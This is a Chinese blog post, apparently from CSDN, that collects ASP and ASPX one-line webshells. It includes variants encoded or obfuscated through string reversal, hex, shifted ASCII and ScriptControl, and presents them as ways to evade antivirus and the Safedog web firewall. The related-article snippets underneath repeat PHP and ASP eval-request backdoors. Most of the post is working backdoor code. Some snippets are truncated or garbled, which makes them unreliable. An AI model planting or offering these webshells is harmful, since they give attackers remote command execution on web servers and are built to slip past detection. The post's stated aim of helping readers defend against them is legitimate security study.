asp 一句话小马_一句话木马:ASP篇

最新推荐文章于 2024-08-13 20:47:30 发布
最新推荐文章于 2024-08-13 20:47:30 发布
阅读量805 收藏
点赞数
文章标签: asp 一句话小马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39762441/article/details/112014173
版权
本文详细介绍了ASP环境下的一句话木马,包括不同编码和加密方式的后门示例,如通过UTF-7编码、Script Encoder加密、字符拼接等方式进行动态解码,以逃避检测。同时,提供了几种免杀技巧,如使用变量拼接执行命令。文章还提及了过狗防火墙的后门例子,并给出了相关参考资料,帮助读者了解和防范ASP一句话木马。
摘要由CSDN通过智能技术生成

ASP一句话木马收集:

""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>

"" then ExecuteGlobal request("c") end if %>

< %'

UTF-7编码加密:

Script Encoder 加密  //密码c

这段代码将"eval request(/*/z/*/)"逆序成")/*/z/*/(tseuqer lave", 以逃避特征码查杀, 当脚本被访问, 其代码会被动态的解码还原成原始的一句话后门. 当前90%以上的未知后门和变形后门都是使用此类动态解码技术

Function MorfiCoder(Code)

MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)

End Function

Execute MorfiCoder(")/*/z/*/(tseuqer lave")

%>

密码 z

可以躲过雷客图的一句话木马:

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.AddObject "session", session

ms.AddObject "server", server

ms.AddObject "application", application

ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>

password=Request("class")

Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function

%>

password=Request("class")

Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function

%>

简单的aspx免杀

var a = Request.Item["M"];var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管

eval(a,b);

Response.Write("Test");%>

过狗一句话:

'

''''''''''''''''''

'''''''''play = request("#")%>Error

参考资料:

一些常见的webshell后门的特征码  https://zhuanlan.zhihu.com/p/22149072

有关一句话后门的收集与整理         http://book.51cto.com/art/201204/328741.htm

asp执行cmd实例                            http://m.blog.csdn.net/woswod/article/details/63253494

weixin_39762441
关注
asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用
weixin_39528525的博客
12-29 1万+
1.什么是webshellWeb 即 web服务也就是网站Shell 即人机交互界面,取得对服务器/电脑某种程度上的操作权限。Webshell即拿到网站服务器的权限(shell)比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。2.怎么才能get shell使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。常见的木马:asp一句话...
一句话木马原理与实战
V
07-30 3382
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:    <?php @eval($_POST[value]);?>    aspx一句话木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
牛逼的一句话木码
Daoke37的博客
05-10 304
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
ASP+PHP两用一句话客户端
08-26
ASP+PHP两用一句话客户端
aspx命令执行小马
最新发布
2301_77012231的博客
08-13 180
【代码】aspx命令执行小马
asp 一句话小马_一个ASP小马
weixin_39681058的博客
12-29 386
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=...
C++输出字符型指针地址
给你一颗小瓜子的博客
10-21 2603
C++标准库中I/O类对<<操作符重载,因此在遇到字符型指针时会将其当作字符串名来处理,输出指针所指的字符串。因此,我们用static_cast强制类型转换把字符串指针转换成无类型指针即可输出指针地址 #include<iostream> using namespace std; int main() { char *p="abc"; cout << p << endl;//"abc" cout << *p &lt
asp一句话
callmeevil的专栏
06-24 467
webshell与一句话木马
2ed
06-23 3098
webshell 可理解为web+shell 通常就是大佬所说的大马 web就是指web页面,shell就是命令执行环境。webshell就是以 aspaspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将aspaspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来...
Web安全:一句话木马
cldimd的博客
09-11 4915
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']) ?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括
一个ASP小马
01-20
ASP小马】是一种利用ASP(Active Server Pages)脚本语言构建的恶意代码,通常用于非法入侵或控制服务器。在给定的描述中,我们看到了一个具体的ASP小马的实现,它通过处理HTTP请求来执行特定操作,如上传文件。 ...
asp小马
06-25
asp小马asp小马asp小马asp小马asp小马asp小马asp小马
ASP免杀大马
10-02
ASP免杀大马
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed]  Execute(HextoStr(“65786563757465287265717565737428636872283335292929”))  Function HextoStr(data)  HextoStr=”EXECUTE “””””  C=”&CHR(&H”  N=”)”  Do While Len(data)>1  If IsNumeric(Left(data,1)) Then  HextoStr=HextoStr&C&Left(data,2)&N  data=Mid
全能ASP小马
01-02
全能的ASP小马,有密码的保护,美化版 正的很好用
AG一句话木马总结
weixin_45486362的博客
06-25 529
asp一句话木马 <%eval request("AG")%> <%execute request("AG")%> <%execute(request("AG"))%> <%execute request("AG")%><%'<% loop <%:%> <%'<% loop <%:%><%execute request("AG")%> "%><%execute(request("
ASP一句话木马(转)
hackerie的博客
10-24 1591
转自:http://blog.csdn.net/eldn__/article/details/8452269
asp一句话木马原理
热门推荐
JackLiu16的博客
11-10 1万+
一句话木马入侵原理 是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件。  仔细观察一下这句代码,括号里的“#”是我们一句话的密码,我们可以把它改成任意字符,这样可以避免别人发现我们的一句话木马后,轻松的通过它捡个大便宜,如果我们上传的一句话代码为。那么在客户端连接文件里要将textarea name=”#”将其改为对应的textarea name=“123
asp php 一句话,asp,php,aspx一句话集合
weixin_39792049的博客
03-09 235
推荐还是把一句话加进图片里面去。普通的php一句话:普通的asp一句话aspx突破一流的:dim daset fso=server.createobject(“scripting.filesystemobject”)path=request(“path”)if path<>”" thendata=request(“da”)set da=fso.createtextfile(path,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值